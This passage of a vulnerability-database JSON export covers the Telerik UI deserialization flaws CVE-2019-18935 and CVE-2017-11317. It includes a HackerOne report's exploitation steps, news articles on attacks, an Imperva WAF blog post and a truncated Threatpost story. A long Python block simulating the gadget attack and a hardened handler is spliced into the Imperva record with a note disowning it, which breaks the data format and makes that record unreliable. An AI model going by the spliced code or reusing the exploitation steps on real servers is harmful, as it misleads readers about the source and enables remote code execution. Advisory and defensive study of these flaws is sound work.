supposed to Sleep(10). This will make the server hang for roughly ten seconds, and after that you will get a response like this one: `[*] Response time: 12.88 seconds`\n- The exploit worked.\n\nThings to note\n---------------------\nI had to edit the original exploit code provided in the aforementioned blog post (https://github.com/noperator/CVE-2019-18935) because I noticed that when uploading the .dll file the server added a .tmp at the end of the file name.\nThat's why the original code was failing to exploit the deserialization part.\nI added `+ '.tmp'` at the end of line 95 and after that it worked just fine.\n\nA DLL file can only work once. This means that to test the vulnerability again a new DLL has to be compiled.\nFor this reason I provided several DLLs in the attachments so you don't have to compile them (especially because a windows machine with Visual Studio installed is required).\n\nI didn't upload a reverse shell because I thought it was not a great idea, but if needed I could do it.\n\nHow to fix\n---------------------\nJust upgrade Telerik for ASP.NET AJAX to R3 2019 SP1 (v2019.3.1023) or later.\n\n## Impact\n\nFull **Remote Code Execution** on the vulnerable server.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-03T14:48:45", "type": "hackerone", "title": "U.S. 
Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI ", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-05-07T16:54:15", "id": "H1:838196", "href": "https://hackerone.com/reports/838196", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:17", "description": "A new highly capable and persistent threat actor has been targeting major high-profile public and private entities in the U.S. as part of a series of targeted cyber intrusion attacks by exploiting internet-facing Microsoft Internet Information Services ([IIS](<https://en.wikipedia.org/wiki/Internet_Information_Services>)) servers to infiltrate their networks.\n\nIsraeli cybersecurity firm Sygnia, which identified the campaign, is tracking the advanced, stealthy adversary under the moniker \"Praying Mantis\" or \"TG1021.\"\n\n\"TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine's memory and leaves little-to-no trace on infected targets,\" the researchers [said](<https://www.sygnia.co/praying-mantis-targeted-apt>). 
\"The threat actor also uses an additional stealthy backdoor and several post-exploitation modules to perform network reconnaissance, elevate privileges, and move laterally within networks.\" \n\nBesides exhibiting capabilities that show a significant effort to avoid detection by actively interfering with logging mechanisms and successfully evading commercial endpoint detection and response (EDR) systems, the threat actor has been known to leverage an arsenal of ASP.NET web application exploits to gain an initial foothold and backdoor the servers by executing a sophisticated implant named \"NodeIISWeb\" that's designed to load custom DLLs as well as intercept and handle HTTP requests received by the server.\n\nThe vulnerabilities that are taken advantage of by the actor include:\n\n * Checkbox Survey RCE Exploit ([CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>))\n * VIEWSTATE Deserialization Exploit\n * Altserialization Insecure Deserialization\n * Telerik-UI Exploit ([CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) and [CVE-2017-11317](<https://nvd.nist.gov/vuln/detail/CVE-2017-11317>))\n\nInterestingly, Sygnia's investigation into TG1021's tactics, techniques, and procedures (TTPs) has unearthed \"major overlaps\" with those of a nation-sponsored actor named \"[Copy-Paste Compromises](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>),\" as detailed in an advisory released by the Australian Cyber Security Centre (ACSC) in June 2020, which described a cyber campaign targeting public-facing infrastructure primarily through the use of unpatched flaws in Telerik UI and IIS servers. 
However, a formal attribution is yet to be made.\n\n\"Praying Mantis, which has been observed targeting high-profile public and private entities in two major Western markets, exemplifies a growing trend of cyber criminals using sophisticated, nation-state attack methods to target commercial organizations,\" the researchers said. \"Continuous forensics activities and timely incident response are essential to identifying and effectively defending networks from attacks by similar threat actors.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T11:11:00", "type": "thn", "title": "New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2021-27852"], "modified": "2022-02-23T04:34:16", "id": "THN:942BFBB34DF6A24E460572684F648005", "href": 
"https://thehackernews.com/2021/08/new-apt-hacking-group-targets-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "Intelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 
9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): 
[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2020-08-07T08:03:43", "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. 
In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.NET AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nTo exploit the insecure deserialization in CVE-2019-18935, the attacker must first know the key used to encrypt the upload request. That is where the older file upload vulnerability, CVE-2017-11317, comes in: Telerik shipped a default encryption key for RadAsyncUpload requests, so on any deployment that never changed it the key is effectively public. With the key, an attacker can rewrite the \u201cTempTargetFolder\u201d variable in the upload request, which allows file uploads to anywhere in the file system the web server\u2019s identity has write permissions to.\n\nThe Bishop Fox write-up for the more recent vulnerability, CVE-2019-18935, describes the anatomy of the RadAsyncUpload upload request, in which the rauPostData parameter contains both a serialized configuration object and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. 
The part of the parameter before the \u201c&\u201d, highlighted in blue, is the serialized configuration object, and the part after, highlighted in yellow, is the object's declared type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could change the specified type to a gadget (a class already loadable by the application whose deserialization has a useful side effect for the attacker) in a subsequent request, they could achieve remote code execution on the server, because the handler instantiates whatever type the request names and populates it from the attacker-controlled JSON.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June we observed requests matching the CVE-2019-18935 exploit pattern on 645 occasions. 
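The request flow just described, as an added worked example that is not code from Imperva, Telerik or Bishop Fox. It models a client building rauPostData as enc(config) & enc(type) and a server deserializing it, with the pre-fix and fixed handlers side by side, to show what a known key buys the attacker. Assumptions: the cipher is a keyed-XOR stand-in for Telerik's AES scheme (only the shared-key property matters here), the key value, TEMP_ROOT, the plaintext TempTargetFolder path and the Constructed.Gadget.Installer type are invented for the demo, and the expected type name is used without its assembly qualifier.

```python
"""Added example (not code from the Imperva post, Telerik or Bishop Fox): a simplified
model of RadAsyncUpload's rauPostData handling, showing why a known encryption key
yields both arbitrary-folder upload (CVE-2017-11317) and RCE (CVE-2019-18935).
Assumptions: keyed-XOR stand-in for Telerik's AES scheme; the key, TEMP_ROOT and
the gadget type name are constructed for the demo."""
import base64
import json
import os
from itertools import cycle


def encrypt(key: bytes, plaintext: str) -> str:
    # Stand-in for the real AES-based encryption; only the shared-key property matters.
    data = plaintext.encode("utf-8")
    return base64.b64encode(bytes(b ^ k for b, k in zip(data, cycle(key)))).decode()


def decrypt(key: bytes, token: str) -> str:
    data = base64.b64decode(token)
    return bytes(b ^ k for b, k in zip(data, cycle(key))).decode("utf-8")


DEFAULT_KEY = b"constructed-default-key"   # models the well-known pre-fix default key
EXPECTED_TYPE = "Telerik.Web.UI.AsyncUploadConfiguration"   # assembly qualifier omitted
TEMP_ROOT = "/var/www/app/App_Data/RadUploadTemp"          # constructed temp-folder root


def build_rau_post_data(key: bytes, config: dict, type_name: str) -> str:
    """Client side: rauPostData = enc(JSON config) + '&' + enc(type name)."""
    return encrypt(key, json.dumps(config)) + "&" + encrypt(key, type_name)


class AsyncUploadConfiguration:
    """The type the handler expects (TempTargetFolder modelled as a plain path here)."""
    def __init__(self, **kw):
        self.temp_target_folder = kw.get("TempTargetFolder")


EXECUTED = []   # records what the constructed gadget did when it was deserialized


class ConstructedGadget:
    """Stand-in for a .NET gadget class: a property setter with a dangerous side effect."""
    def __init__(self, **kw):
        EXECUTED.append(kw.get("Command"))


TYPE_REGISTRY = {EXPECTED_TYPE: AsyncUploadConfiguration,
                 "Constructed.Gadget.Installer": ConstructedGadget}


def vulnerable_handler(key: bytes, rau_post_data: str):
    """Pre-fix behaviour: decrypt, then instantiate whatever type the client named."""
    enc_cfg, enc_type = rau_post_data.split("&", 1)
    cfg = json.loads(decrypt(key, enc_cfg))
    return TYPE_REGISTRY[decrypt(key, enc_type)](**cfg)


def hardened_handler(key: bytes, rau_post_data: str) -> AsyncUploadConfiguration:
    """Fixed behaviour: allowlist the type and keep TempTargetFolder under TEMP_ROOT."""
    enc_cfg, enc_type = rau_post_data.split("&", 1)
    type_name = decrypt(key, enc_type)
    if type_name != EXPECTED_TYPE:
        raise ValueError(f"rejected rauPostData type {type_name!r}")
    cfg = json.loads(decrypt(key, enc_cfg))
    temp = os.path.normpath(os.path.join(TEMP_ROOT, str(cfg.get("TempTargetFolder", ""))))
    if temp != TEMP_ROOT and not temp.startswith(TEMP_ROOT + os.sep):
        raise ValueError(f"TempTargetFolder {temp!r} escapes the upload temp root")
    cfg["TempTargetFolder"] = temp
    return AsyncUploadConfiguration(**cfg)


def _raises(fn, *args) -> bool:
    try:
        fn(*args)
    except ValueError:
        return True
    return False


def run_demo() -> dict:
    """Three requests, each run through both handlers; returns what happened."""
    EXECUTED.clear()
    out = {}
    legit = build_rau_post_data(DEFAULT_KEY, {"TempTargetFolder": "session1"}, EXPECTED_TYPE)
    out["legit_folder"] = hardened_handler(DEFAULT_KEY, legit).temp_target_folder
    # CVE-2017-11317 style: with the key known, point the temp folder at the webroot.
    traversal = build_rau_post_data(DEFAULT_KEY, {"TempTargetFolder": "../../wwwroot"}, EXPECTED_TYPE)
    out["vuln_accepts_traversal"] = vulnerable_handler(DEFAULT_KEY, traversal).temp_target_folder
    out["hardened_blocks_traversal"] = _raises(hardened_handler, DEFAULT_KEY, traversal)
    # CVE-2019-18935 style: swap the type for a gadget; the JSON becomes its constructor args.
    gadget = build_rau_post_data(DEFAULT_KEY, {"Command": "calc.exe"}, "Constructed.Gadget.Installer")
    vulnerable_handler(DEFAULT_KEY, gadget)
    out["vuln_ran_gadget"] = list(EXECUTED)
    out["hardened_blocks_gadget"] = _raises(hardened_handler, DEFAULT_KEY, gadget)
    return out


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Run it directly to see both handlers' verdicts. The hardened path applies the two checks that remove both bugs (an allowlisted configuration type and a temp folder pinned under the upload root); note that a WAF can only approximate the first check from the outside, since it cannot read the type portion without the key, which is why the Imperva rules above key on the request pattern instead.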
The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. 
When certain conditions are met, the Cloud WAF proxies inspect the response from the server, from which they can identify known webshells, and block subsequent requests to them.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>).\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen ASP.NET webshell\n\nThis is a simple, open source ASP.NET webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmd.exe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code in a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. 
Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T15:01:00", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2019-19781"], "modified": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-4958"], "description": "All versions of an HTML editor used in several Microsoft technologies, including ASP.NET, suffer from a high-risk cross-site scripting (XSS) vulnerability that could allow an attacker to inject malicious script and glean private information.\n\nThe problem exists in all versions of RadEditor, a WYSIWYG text editor manufactured by Bulgaria-based firm Telerik, according to security researcher G.S. 
McNamara, who disclosed the vulnerability on [his blog late last week](<http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/>).\n\n\u201cTechnically speaking, this is a massive hole in how existing input validation security filters work in unison,\u201d McNamara said in an email Thursday to Threatpost regarding the vulnerability.\n\nThe editor, which allows users to input rich-text, is used to varying degrees in Microsoft products like [MSDN, CodePlex, TechNet, and MCMS, along with some Sharepoint and ASP.NET implementations](<http://demos.telerik.com/aspnet-ajax/editor/examples/overview/defaultcs.aspx>).\n\n\u201cIt\u2019s a silent killer, too, because at least one commercial penetration-testing tool failed to find it\u201d McNamara said, \u201cYou just get a false negative.\u201d\n\nMcNamara initially found the vulnerability (CVE-2014-4958) in a 2009 version (2009.3.1208.20) of the product on Internet Explorer along with a 2014 version but suggests it could have existed in previous iterations of the editor.\n\n\u201cI just had a hunch and followed it obsessively, manually,\u201d McNamara said of his search for the bug, which he first dug up on July 9.\n\nFrom there it took about two months of going back and forth with the company.\n\nWhen he first contacted Telerik\u2019s Customer Support department, it insisted the bug had already been fixed. To prove his case McNamara forwarded the company his exploit code. When Telerik still wouldn\u2019t put him in touch with anyone in charge of security, McNamara ultimately had to go through what he calls \u201cunofficial channels,\u201d by sending a personal email to a Telerik employee\u2019s Gmail account in late August, to finally get the ball rolling.\n\nIt wasn\u2019t until earlier this month that the researcher and the company agreed to coordinate a disclosure. 
